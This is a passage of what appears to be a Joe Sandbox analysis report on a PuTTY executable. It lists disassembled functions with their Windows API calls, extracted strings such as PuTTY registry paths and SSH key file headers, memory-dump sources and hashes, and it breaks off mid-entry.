                      Function 00007FF678617130 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 120memoryCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: DescriptorInitializeLocalSecurity$AllocateErrorFreeLast$AllocDaclOwner
                      • String ID: unable to allocate security descriptor: %s$unable to construct ACL: %s$unable to initialise security descriptor: %s$unable to set DACL in security descriptor: %s$unable to set owner in security descriptor: %s
                      • API String ID: 436594416-3066058096
                      • Opcode ID: d06c1e6c915d6b0c1d8c19af5bbfd37ba5b97767618dbb2da938d1d845b5b241
                      • Instruction ID: 03cd4fa9374550bdaec0906cb161fb2ac5b98fb9e9e53bdb525461e41f8acaae
                      • Opcode Fuzzy Hash: d06c1e6c915d6b0c1d8c19af5bbfd37ba5b97767618dbb2da938d1d845b5b241
                      • Instruction Fuzzy Hash: E9519F32A18A82A1F7618F29E4153A77BA0EF94740F204034DA8D87759DF7DDD46DB48
                      Function 00007FF6785D11BB Relevance: 20.1, APIs: 10, Strings: 1, Instructions: 820windowCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Keyboard$State$CountCounterLayoutMessagePerformanceProcQueryTickTranslateWindow
                      • String ID: +
                      • API String ID: 3269656489-2126386893
                      • Opcode ID: 5048b1fd3e11757cdc2f02bb580d9d34742875738b81cee9be2e4fa771e52dc8
                      • Instruction ID: 015b0230e9e24fe09b0e698bdc21a19fbf0bb7161a217c7da99aaf372040c4ca
                      • Opcode Fuzzy Hash: 5048b1fd3e11757cdc2f02bb580d9d34742875738b81cee9be2e4fa771e52dc8
                      • Instruction Fuzzy Hash: 9082D023E2C68285FBA08B34D4843BA2F91AF95394F344135CE8DC66D5DF6CEC859B19
                      Function 00007FF67860DA70 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 167libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00007FF678616460: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6786DEAB3,00000000), ref: 00007FF67861652D
                        • Part of subcall function 00007FF678616460: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6786DEAB3,00000000), ref: 00007FF678616576
                      • GetProcAddress.KERNEL32 ref: 00007FF67860DB33
                        • Part of subcall function 00007FF67860E210: CreateFileA.KERNEL32(?,?,?,?,?,?,?,00000000,00007FF67860DCDB), ref: 00007FF67860E25D
                      • GetEnvironmentVariableA.KERNEL32 ref: 00007FF67860DC25
                      • GetEnvironmentVariableA.KERNEL32 ref: 00007FF67860DC3B
                      • GetWindowsDirectoryA.KERNEL32 ref: 00007FF67860DCA5
                        • Part of subcall function 00007FF678616750: RegQueryValueExA.ADVAPI32(?,?,?,?,?,00000001,00000000,00007FF67860DAC6), ref: 00007FF67861678D
                        • Part of subcall function 00007FF678616750: RegQueryValueExA.ADVAPI32 ref: 00007FF6786167D4
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: CreateEnvironmentQueryValueVariable$AddressCloseDirectoryFileProcWindows
                      • String ID: HOMEDRIVE$HOMEPATH$RandSeedFile$SHGetFolderPathA$Software\SimonTatham\PuTTY$\PUTTY.RND$shell32.dll
                      • API String ID: 901926110-1528239033
                      • Opcode ID: 28cc407d49ef5bbbb69a0de68a39b9953fd264344be2787beb1a124646fe071b
                      • Instruction ID: dfbf2c871246c0cb7757d70483436448ac211915b844bd117db0b371a029b077
                      • Opcode Fuzzy Hash: 28cc407d49ef5bbbb69a0de68a39b9953fd264344be2787beb1a124646fe071b
                      • Instruction Fuzzy Hash: C961D562B3C65261FA209735A454BE71B909F88790F640231DE4DC77C6EE2CED45A70C
                      Function 00007FF6785DD2D0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 150fileCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: File$Create$CloseCurrentDeleteErrorHandleLastPathProcessTempWrite
                      • String ID: %s::/%s.html>main$%s\putty_%lu_%llu.chm
                      • API String ID: 4085685679-1808412575
                      • Opcode ID: d976e458e8c62dd64c10ecddeec44299d36c0de5727f10c3b9b683b6b2cc316c
                      • Instruction ID: 686528646fca896883ea94f7c7c14443f91e29d9ebe80c83b745472df72e7d9e
                      • Opcode Fuzzy Hash: d976e458e8c62dd64c10ecddeec44299d36c0de5727f10c3b9b683b6b2cc316c
                      • Instruction Fuzzy Hash: DB51D123A2864292F6909B31A8487772FA0BB46BA4F340234DE1DC77C5CF7CEC459B08
                      Function 00007FF6785D7D50 Relevance: 16.7, APIs: 11, Instructions: 183COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Object$Select$Create$DeleteLineMovePixelPolyline
                      • String ID:
                      • API String ID: 1020918164-0
                      • Opcode ID: 450bcdd224cc7f4c6583d93fecdf1e34ce695ac6226fb09f393737156ed8a644
                      • Instruction ID: 624618667b3247c5bc42899d363534ec5e25908ac59769952121888d0a001400
                      • Opcode Fuzzy Hash: 450bcdd224cc7f4c6583d93fecdf1e34ce695ac6226fb09f393737156ed8a644
                      • Instruction Fuzzy Hash: 12719433A2865656F3508B35A88433ABB91BB94BA0F244036DE0DC7794DE7DED459B08
                      Function 00007FF678616F90 Relevance: 13.6, APIs: 9, Instructions: 111memoryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: CloseHandleLocalProcess$AllocCopyCurrentErrorFreeLastLengthOpen
                      • String ID:
                      • API String ID: 621491157-0
                      • Opcode ID: be4c0ee50220b4914d8cbec88b3ec0bc8c3512ae49324cd7ad89bb247be0c340
                      • Instruction ID: 41cbc4b3274e8dcecca5c5be51bf67601dc78a832d587b05564cf6a82c788398
                      • Opcode Fuzzy Hash: be4c0ee50220b4914d8cbec88b3ec0bc8c3512ae49324cd7ad89bb247be0c340
                      • Instruction Fuzzy Hash: 54419227F2864252FA508B76A45473B6B91AF84F81F294034DD0EC7B89DE3CED45AB08
                      Function 00007FF6785D7060 Relevance: 13.6, APIs: 9, Instructions: 71clipboardmemorywindowCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ClipboardGlobal$AllocCloseDataEmptyFreeLockMessageOpenSendUnlock
                      • String ID:
                      • API String ID: 4091238221-0
                      • Opcode ID: 951538910bdbc72113cd30d488f82dc269d8cb1585c1cd1720b85c1cf1ffabcc
                      • Instruction ID: 4b03735fbaa0865e168b762c3b563bef3e0b0920f6c59e904858bfbf03f03a55
                      • Opcode Fuzzy Hash: 951538910bdbc72113cd30d488f82dc269d8cb1585c1cd1720b85c1cf1ffabcc
                      • Instruction Fuzzy Hash: A921C123B2921295FB915F72A898B361F91AF61FD1F289034CD1DCA794CE3CED459B08
                      Function 00007FF678617C30 Relevance: 13.3, APIs: 4, Strings: 3, Instructions: 1078COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      • *#****o~**+++++-----++++|****L., xrefs: 00007FF678618E0E
                      • CueaaaaceeeiiiAAE**ooouuyOUc$YPsaiounNao?++**!<>###||||++||++++++--|-+||++--|-+----++++++++##||#aBTPEsyt******EN=+><++-=... n2* , xrefs: 00007FF67861901F
                      • !cL.Y|S"Ca<--R~o+23'u|.,1o>///?AAAAAAACEEEEIIIIDNOOOOOxOUUUUYPBaaaaaaaceeeeiiiionooooo/ouuuuypy, xrefs: 00007FF678618D9A
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ByteCharInfoMultiWide
                      • String ID: !cL.Y|S"Ca<--R~o+23'u|.,1o>///?AAAAAAACEEEEIIIIDNOOOOOxOUUUUYPBaaaaaaaceeeeiiiionooooo/ouuuuypy$*#****o~**+++++-----++++|****L.$CueaaaaceeeiiiAAE**ooouuyOUc$YPsaiounNao?++**!<>###||||++||++++++--|-+||++--|-+----++++++++##||#aBTPEsyt******EN=+><++-=... n2*
                      • API String ID: 2366317374-259461551
                      • Opcode ID: 3ce847713b9989b78afe54f3cac964a57e713b8776fab879d99fefa28a828a02
                      • Instruction ID: 101c89909acbc46e3871e2db24c0b2955f7c403caa7fabf7cb22b47365787459
                      • Opcode Fuzzy Hash: 3ce847713b9989b78afe54f3cac964a57e713b8776fab879d99fefa28a828a02
                      • Instruction Fuzzy Hash: 67C2C113D2878692F6224B34E8013FBA761FFA4704F149331DB9A515B2EF6CB9C5A709
                      Function 00007FF6785FAAF0 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 317comCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: CreateInstance
                      • String ID: Pageant.exe$Recent Sessions
                      • API String ID: 542301482-148644000
                      • Opcode ID: 7dde4ad06f94e58ba722ff84eb97f0fa8fb844da0378d740b24b288f643abab2
                      • Instruction ID: 99243b27e2aee0c04ac65ed9aabf4253b17e632d0b062c18512d584e4522ef0d
                      • Opcode Fuzzy Hash: 7dde4ad06f94e58ba722ff84eb97f0fa8fb844da0378d740b24b288f643abab2
                      • Instruction Fuzzy Hash: DDE15B37628A4692EB419B26E44436E7B61FB84B88F604032EE4E87764DF7DE905CB05
                      Function 00007FF6785D1160 Relevance: 12.3, APIs: 8, Instructions: 294COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d5412766714560a4fbff42f61eca60b5f976890a9ac266f06ccb218d8818102f
                      • Instruction ID: 5fa044f86482004fb285c3670967a95d6a5b495a6a62f76a3d11923e67a0000d
                      • Opcode Fuzzy Hash: d5412766714560a4fbff42f61eca60b5f976890a9ac266f06ccb218d8818102f
                      • Instruction Fuzzy Hash: 5EC1B063E2C68286F7A48B34A8847BA6E90AF94744F740435CE4DC66A1DF7CFC45DB18
                      Function 00007FF678646FE0 Relevance: 11.5, Strings: 9, Instructions: 234COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID: $---- BEGIN SSH2 ENCRYPTED PRIVAT$---- BEGIN SSH2 PUBLIC KEY$-----BEGIN $-----BEGIN OPENSSH PRIVATE KEY$0123456789$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/=$PuTTY-User-Key-File-$SSH PRIVATE KEY FILE FORMAT 1.1
                      • API String ID: 0-166194441
                      • Opcode ID: 7ece83b8144924435dc628800ce00697e9af41aed47ab00858ca3585a7664754
                      • Instruction ID: 64ab46ad5c2118b2a9b5aec21b21710d4b7415d35397dbffbebd06a19f0f6984
                      • Opcode Fuzzy Hash: 7ece83b8144924435dc628800ce00697e9af41aed47ab00858ca3585a7664754
                      • Instruction Fuzzy Hash: 98C18223A28AC6A4FA21DB34E4553FB6761FBD4B44F608031CA8D83696DF3CDA49D744
                      Function 00007FF6786ADDF8 Relevance: 10.8, APIs: 7, Instructions: 286COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: _invalid_parameter_noinfo
                      • String ID:
                      • API String ID: 3215553584-0
                      • Opcode ID: 183414eea92ac05355f01f144efcc7a106660819817fb9335955ce3f47e8f072
                      • Instruction ID: 485796ed3104cbe5ce503121d5a3b268426ed366913968a24cd4fedb9abd4648
                      • Opcode Fuzzy Hash: 183414eea92ac05355f01f144efcc7a106660819817fb9335955ce3f47e8f072
                      • Instruction Fuzzy Hash: 74C1EF27A28666A5E7609B3194442BF7F90FB91B80F650135DA4D833D1CE7CEC64A70A
                      Function 00007FF67860D150 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 210registryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00007FF678616460: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6786DEAB3,00000000), ref: 00007FF67861652D
                        • Part of subcall function 00007FF678616460: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6786DEAB3,00000000), ref: 00007FF678616576
                        • Part of subcall function 00007FF678616750: RegQueryValueExA.ADVAPI32(?,?,?,?,?,00000001,00000000,00007FF67860DAC6), ref: 00007FF67861678D
                        • Part of subcall function 00007FF678616750: RegQueryValueExA.ADVAPI32 ref: 00007FF6786167D4
                      • RegCloseKey.ADVAPI32 ref: 00007FF67860D1E2
                      • RegCloseKey.ADVAPI32 ref: 00007FF67860D223
                      • RegCloseKey.ADVAPI32 ref: 00007FF67860D42F
                        • Part of subcall function 00007FF678616840: RegSetValueExA.ADVAPI32 ref: 00007FF678616873
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Close$Value$Query$Create
                      • String ID: %s@%d:$Software\SimonTatham\PuTTY\SshHostKeys$rsa
                      • API String ID: 306613542-1153710622
                      • Opcode ID: f409c6af9f2dbabcd250491df0d28a4a6c5a720deabbcc0a770a656b35dfe07a
                      • Instruction ID: 5de150b538d8deefd131bf9af7ef3b20f5752398cfd10889308c572e17c06742
                      • Opcode Fuzzy Hash: f409c6af9f2dbabcd250491df0d28a4a6c5a720deabbcc0a770a656b35dfe07a
                      • Instruction Fuzzy Hash: 3981C623F3D64261FA14973294557BB6A91AF45B84F645231EE0EC7386EE3CEC02E348
                      Function 00007FF678626B00 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 60libraryfileloaderCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: AddressCloseFileFindFirstHandleProc
                      • String ID: GetFileAttributesExA$P$kernel32.dll
                      • API String ID: 3854970465-2903979390
                      • Opcode ID: 4df7923f3d34a13ec1fca3f67debcc568d9fa5f0b123719f43d6eb1f8322b689
                      • Instruction ID: b5967db93cc8a63822222d95332180bb43eba3327b907c0633bfec042046a146
                      • Opcode Fuzzy Hash: 4df7923f3d34a13ec1fca3f67debcc568d9fa5f0b123719f43d6eb1f8322b689
                      • Instruction Fuzzy Hash: 6A21A323A29A4361FA21DB35B8043773B92AF84BA5F610271D85DC7794DF2CED15AB08
                      Function 00007FF6785E1330 Relevance: 9.4, Strings: 7, Instructions: 647COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
